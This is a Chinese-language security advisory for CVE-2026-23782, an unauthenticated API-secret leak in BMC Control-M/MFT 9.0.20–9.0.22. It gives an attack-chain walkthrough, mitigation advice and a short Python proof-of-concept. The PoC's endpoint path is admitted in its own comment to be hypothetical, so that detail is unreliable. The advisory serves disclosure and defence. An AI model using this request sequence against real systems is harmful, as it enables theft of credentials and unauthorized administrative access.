IPBUF安全漏洞报告
English
CVE-2026-23782 CVSS 7.5 高危

CVE-2026-23782 BMC Control-M/MFT 信息泄露漏洞

披露日期: 2026-04-10

漏洞信息

漏洞编号
CVE-2026-23782
漏洞类型
信息泄露
CVSS评分
7.5 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
BMC Control-M/MFT

相关标签

信息泄露未授权访问BMC Control-MAPI安全

漏洞概述

BMC Control-M/MFT 在版本 9.0.20 至 9.0.22 中存在一个安全漏洞。该漏洞源于一个API管理端点的配置错误,允许未经身份验证的攻击者获取API标识符及其对应的密钥值。由于这些敏感凭据被暴露,攻击者可以利用它们调用特权API操作,从而获取系统的未授权访问权限。此漏洞无需用户交互即可通过网络进行利用,对数据的机密性构成高风险。

技术细节

该漏洞的根源在于BMC Control-M/MFT软件的API管理端点中存在访问控制缺陷。在受影响版本(9.0.20至9.0.22)中,系统未对特定用于查询API信息的接口进行有效的身份验证检查。攻击者无需提供任何凭证,即可直接向该漏洞端点发起网络请求。服务器在接收到请求后,会错误地返回API标识符及其对应的Secret密钥。由于这些密钥通常用于验证API调用者的身份,一旦泄露,攻击者便可以利用截获的凭据构造合法的API请求。这使得攻击者能够绕过系统原本的安全机制,以高权限身份执行敏感操作,如数据导出、配置修改或其他管理功能,从而完全控制受影响的服务组件。

攻击链分析

STEP 1
1. 信息收集
攻击者扫描网络,识别运行BMC Control-M/MFT且版本在9.0.20至9.0.22之间的目标主机。
STEP 2
2. 漏洞利用
攻击者向存在缺陷的API管理端点发送未经身份验证的HTTP请求。
STEP 3
3. 获取凭据
服务器响应请求,返回API标识符(ID)和对应的Secret密钥。
STEP 4
4. 提权与操作
攻击者利用获取的Secret密钥签名API请求,以管理员或高权限身份调用系统接口,执行未授权操作。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests def exploit_cve_2026_23782(target_url): """ PoC for CVE-2026-23782: Attempts to retrieve API secrets from the exposed management endpoint. """ # Hypothetical vulnerable endpoint path based on vulnerability description vuln_endpoint = f"{target_url}/api/management/secret_exposure" headers = { "User-Agent": "CVE-2026-23782-Scanner" } try: # Sending unauthenticated request response = requests.get(vuln_endpoint, headers=headers, timeout=10) if response.status_code == 200: print("[+] Vulnerability confirmed!") print("[+] API Identifier and Secret leaked:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": target = "http://vulnerable-host:8080" # Replace with actual target exploit_cve_2026_23782(target)

影响范围

BMC Control-M/MFT 9.0.20
BMC Control-M/MFT 9.0.21
BMC Control-M/MFT 9.0.22

防御指南

临时缓解措施
如果无法立即升级,建议通过防火墙策略限制对受影响系统的API管理端口的访问,仅允许受信任的内部IP地址连接。同时,应轮换已暴露的API密钥。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表